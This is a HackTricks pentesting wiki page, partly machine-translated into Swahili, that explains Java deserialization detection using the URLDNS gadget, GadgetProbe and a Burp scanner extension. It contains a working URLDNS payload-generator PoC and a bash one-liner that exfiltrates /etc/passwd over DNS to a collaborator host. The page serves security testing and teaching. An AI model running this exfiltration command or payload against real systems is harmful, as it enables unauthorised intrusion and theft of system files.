hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

# Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## DNS request on deserialization

Darasa `java.net.URL` linafanya kazi `Serializable`, hii inamaanisha kwamba darasa hili linaweza kuandikwa.
```java
public final class URL implements java.io.Serializable {
```
Hii darasa lina **tabia ya kushangaza.** Kutoka kwenye hati: “**Wenyeji wawili wanachukuliwa kuwa sawa ikiwa majina yote ya mwenyeji yanaweza kutatuliwa kuwa anwani sawa za IP**.”\
Basi, kila wakati kitu cha URL kinapoitisha **yoyote** ya **kazi `equals`** au **`hashCode`** ombi la **DNS** kupata Anwani ya IP litakuwa **litatumwa**.

**Kuita** kazi **`hashCode`** **kutoka** kwa kitu cha **URL** ni rahisi sana, inatosha kuingiza kitu hiki ndani ya `HashMap` ambacho kitakuwa kinachakatwa. Hii ni kwa sababu **mwishoni** mwa **kazi `readObject`** kutoka `HashMap` hii nambari inatekelezwa:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}
```
It is **going** the **execute** `putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Kama unavyoweza kuona, **wakati wa deserialization** ya **`HashMap`** kazi `hash` itatekelezwa **na kila kitu** na **wakati** wa utekelezaji wa **`hash`** **itaweza kutekelezwa** `.hashCode()` ya kitu. Hivyo, ikiwa unafanya **deserialization** ya **`HashMap`** **iliyokuwa na** kitu cha **URL**, **kitu cha URL** kita **tekeleza** `.hashCode()`.

Sasa, hebu tuangalie msimbo wa `URLObject.hashCode()`:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
```
Kama unavyoona, wakati `URLObject` inatekeleza `.hashCode()` inaitwa `hashCode(this)`. Kuendelea unaweza kuona msimbo wa kazi hii:
```java
protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]
```
You can see that a `getHostAddress` is executed to the domain, **kuanzisha ombi la DNS**.

Therefore, this class can be **kutumiwa vibaya** in order to **kuanzisha** a **ombio la DNS** to **kuonyesha** that **deserialization** is possible, or even to **kuondoa taarifa** (you can append as subdomain the output of a command execution).

### URLDNS payload code example

You can find the [URDNS payload code from ysoserial here](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). However, just for make it easier to understand how to code it I created my own PoC (based on the one from ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### More information

* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* Katika wazo la asili, mzigo wa makusanyo ya kawaida ulibadilishwa ili kutekeleza uchunguzi wa DNS, hii ilikuwa na uaminifu mdogo kuliko njia iliyopendekezwa, lakini hii ndiyo chapisho: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

Unaweza kupakua [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) kutoka Duka la Burp Suite (Extender).

**GadgetProbe** itajaribu kubaini kama **darasa la Java fulani lipo** kwenye darasa la Java la seva ili uweze kujua **kama** lina **udhaifu** kwa exploit inayojulikana.

### How does it work

**GadgetProbe** itatumia **mzigo wa DNS wa sehemu ya awali** lakini **kabla** ya kuendesha uchunguzi wa DNS itajaribu **kufanya deserialization ya darasa lolote**. Ikiwa **darasa lolote lipo**, **uchunguzi wa DNS** uta **tumwa** na GadgetProbe itakumbuka kwamba darasa hili lipo. Ikiwa **ombio la DNS** halijatumwa **kamwe**, hii inamaanisha kwamba **darasa lolote halikufanywa deserialization** kwa mafanikio hivyo labda halipo au **halitambuliki/haliwezi kutumika**.

Ndani ya github, [**GadgetProbe ina orodha za maneno**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) zenye madarasa ya Java kwa ajili ya kupimwa.

![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1).gif>)

### More Information

* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## Java Deserialization Scanner

Scanner hii inaweza **kupakuliwa** kutoka Duka la Burp App (**Extender**).\
**Kiongezeo** kina **uwezo** wa **kupita** na **kazi**.

### Passive

Kwa kawaida inachunguza **kwa njia ya kupita** maombi yote na majibu yaliyotumwa **ikiangalia** **baiti za uchawi za Java zilizosajiliwa** na itawasilisha onyo la udhaifu ikiwa yoyote itapatikana:

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)

### Active

**Manual Testing**

Unaweza kuchagua ombi, bonyeza kulia na `Send request to DS - Manual Testing`.\
Kisha, ndani ya _Deserialization Scanner Tab_ --> _Manual testing tab_ unaweza kuchagua **nukta ya kuingiza**. Na **anzisha upimaji** (Chagua shambulio linalofaa kulingana na uandishi uliofanywa).

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)

Hata kama hii inaitwa "Manual testing", ni **otomatiki** sana. Itakagua kiotomatiki kama **deserialization** ina **udhaifu** kwa **mzigo wowote wa ysoserial** ikichunguza maktaba zilizopo kwenye seva ya wavuti na itaonyesha zile zenye udhaifu. Ili **kuangalia** maktaba **zenye udhaifu** unaweza kuchagua kuanzisha **Javas Sleeps**, **sleeps** kupitia **matumizi ya CPU**, au kutumia **DNS** kama ilivyotajwa hapo awali.

**Exploiting**

Mara tu unapokuwa umepata maktaba yenye udhaifu unaweza kutuma ombi kwenye _Exploiting Tab_.\
Katika tab hii unapaswa **kuchagua** **nukta ya kuingiza** tena, na **kuandika** **maktaba yenye udhaifu** unayotaka kuunda mzigo kwa, na **amri**. Kisha, bonyeza tu kitufe cha **Attack** kinachofaa.

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/4.png)

### Java Deserialization DNS Exfil information

Fanya mzigo wako utekeleze kitu kama ifuatavyo:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### More Information

* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}